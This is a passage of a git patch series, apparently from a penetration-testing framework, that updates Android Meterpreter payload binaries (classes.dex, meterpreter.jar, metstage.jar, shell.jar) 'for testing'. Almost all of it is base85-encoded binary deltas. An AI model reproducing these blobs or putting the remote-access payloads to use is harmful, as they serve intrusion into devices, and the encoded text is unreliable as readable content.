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 diff --git a/data/android/metstage.jar b/data/android/metstage.jar index 095c7b9a64a328b35850cdffccaaae6fcd8dca33..1271994fbab34694c10605904afaff08038b88f0 100644 GIT binary patch delta 45 ucmdnZx0{bQz?+#xgn@&DgF$0j) From 60b5191873f43c0d1042d0f3d8da1b075afb96c8 Mon Sep 17 00:00:00 2001 
From: joe
Date: Fri, 7 Mar 2014 13:21:30 -0800
Subject: [PATCH 048/853] New meterpreter bins for testing.
---
data/android/apk/AndroidManifest.xml | Bin 3588 -> 3536 bytes
data/android/apk/classes.dex | Bin 6844 -> 10700 bytes
data/android/apk/resources.arsc | Bin 1104 -> 1088 bytes
data/android/meterpreter.jar | Bin 37661 -> 37700 bytes
data/android/metstage.jar | Bin 1993 -> 1851 bytes
data/android/shell.jar | Bin 1853 -> 1853 bytes
6 files changed, 0 insertions(+), 0 deletions(-)
diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 39fa1cea0e34dfb14a1666dbe18fab55ba0fbcbb..6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9 100644 GIT binary patch literal 3536 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 
diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc index 4fe928b45ed5fab291d93e0fdecab81f29535e1f..9175daa84ec0e56982572ea3b65c8ccf7083b71b 100644 GIT binary patch delta 168 zcmcb>ae#xBiGhc~VIr$Ks|5oCL(;@(>xm{>6Q?OL_H5j#%cN++-~kk70%ArW1}RYh zVgy()@uTQu1!f*bhRM3jlEM(>%s_d#@`)dnCpQ2UFi!4;D_}ua@PJtjs+SdA%7H}y E01jaqIRF3v delta 219 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 